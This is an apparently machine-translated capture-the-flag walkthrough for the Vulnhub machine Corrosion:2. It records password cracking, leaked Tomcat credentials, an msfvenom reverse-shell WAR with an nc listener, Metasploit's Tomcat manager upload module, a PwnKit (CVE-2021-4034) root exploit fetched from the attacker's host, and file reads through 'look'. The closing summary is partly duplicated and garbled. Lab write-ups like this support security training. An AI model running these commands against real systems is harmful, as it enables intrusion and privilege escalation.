Vulnhub range - correlation:2

Get ready

attack : kali

Drone aircraft ： CORROSION: 2 NAT 192.168.91.0 Network segment

Download link :

https://www.vulnhub.com/entry/corrosion-2,745/

Information collection and utilization

The host found

Get the target as shown in the figure IP Address : 192.168.91.189

Port scanning

nmap -sV -O -p- -T4 -A 192.168.91.189 --oN corronsion_nmap.txt


As shown in the figure, it is open : 22,80(apache2 default),8080(tomcat) There are three ports , This shows that the target plane web page is composed of java constitute . According to what I have done before tomcat For the target , Get into manager backstage , And then upload war Package to bounce shell.

HTTP

http://192.168.91.189/

http://192.168.91.189:8080/

Directory scanning

python3 dirsearch.py -u http://192.168.91.189:8080/

Suspicious documents

There's a lot of stuff coming out of the scan . among docs,examples These two are tomcat Included documentation and examples .

Let's take a look at readme.txt and backup.zip.

http://192.168.91.189:8080/readme.txt

One said to the , Gave a file that no one could find （ Farting ） Open this file with a password , So it means backup.zip file , Download it .

wget http://192.168.91.189:8080/backup.zip

unzip backup.zip


As shown in the figure, you really need a password

Password cracking

zip2john backup.zip > password_hash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt password_hash.txt

Get the password as shown in the figure :@administrator_hi5, It's coming out soon .

Now decompress
unzip backup.zip

As shown in the figure, the decompression is successful , Many documents

After a search in tomcat-users.xml The user name and password are found at the bottom of the file :

manager:melehifokivai

admin:melehifokivai

Both of these user names can log in tomcat backstage , Log in with two browsers respectively .

Now that I have logged into the backstage , We try to upload a war Bao ran bounced back shell.

Make war Bao can read my previous blog

https://www.ohhhhhh.top/2021/12/29/web penetration ——My-Tomcat-HOST-1/

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.27.243.168 LPORT=4444 -f war > shell.war

kali Turn on nc monitor , And then upload ( take shell.war copy to win11 in )
nc -lvnp 4444

Fuck you 404, It seems that this method will not work .md

And then I found out msfconsole One of them can getshell The module of can be matched with the account and password .
use exploit/multi/http/tomcat_mgr_upload


Set the contents of the red box , The account and password have been obtained .

then ** run **

run after , Input shell Get into shell Suspicious to see is tomcat user .

python3 -c "import pty;pty.spawn(’/bin/bash’)"

Enter this command to get the standard terminal

flag 1

In the catalog /home/randy There is the first one in flag : user.txt

/home/randy/note.txt

 well , Randy , This is your system administrator , I hope you have a nice day ！ I just want you to know 
 I changed your permissions on the home directory . You are temporarily unable to delete or add files .
 I will change these permissions later .
 See you next Monday randy！

Check it out. /etc/passwd Users that can exist in

Method 1

Find out jaye The user's password and manager The passwords of are the same ： melehifokivai

find / -perm -u=s -type f 2>/dev/null

lookup have SUID The command of found a familiar : polkit-agent-helper-1 cve Number :
CVE-2021-4034

exp Connect :

https://github.com/berdav/CVE-2021-4034

I found there was no... On the target plane git command , But you can use wget replace , Finally, I found that there was no make command , Then you can't compile , But we can kali Will have compiled files , Download to the target , And then run , In the future, you will directly upload the compiled files .

Download the compiled file to the target :

wget http://172.27.243.168:8000/CVE-2021-4034.zip


Then decompress
unzip CVE-2021-4034.zip

Then enter CVE-2021-4034 Folder , function ./cve-2021-4034, If there is no accident, you will get root jurisdiction

As shown in the picture, I got root jurisdiction , At this point, it passed again CVE-2021-4034 Mention right to success , It is a loophole that has existed for more than ten years !!!

flag 2

Method 2

jaye:melehifokivai ssh After landing , In its home directory File There is look command , Unauthorized access to files :
./look ‘’ '/root/root.txt’


Read the second one directly as shown in the figure flag , If you submit directly in the competition flag You can score .

Method 3

Reference the big guy's blog :

https://www.cnblogs.com/sainet/p/15668420.html# Three rights

I failed the test here , Maybe it's me .

summary

1. CVE-2021-4034
2. look Unauthorized reading of files
3. msfconsole use exploit/multi/http/tomcat_mgr_upload getshell
   /sainet/p/15668420.html#%E4%B8%89%E6%8F%90%E6%9D%83)
   
   I failed the test here , Maybe it's me .

summary

1. CVE-2021-4034
2. look Unauthorized reading of files
3. msfconsole use exploit/multi/http/tomcat_mgr_upload getshell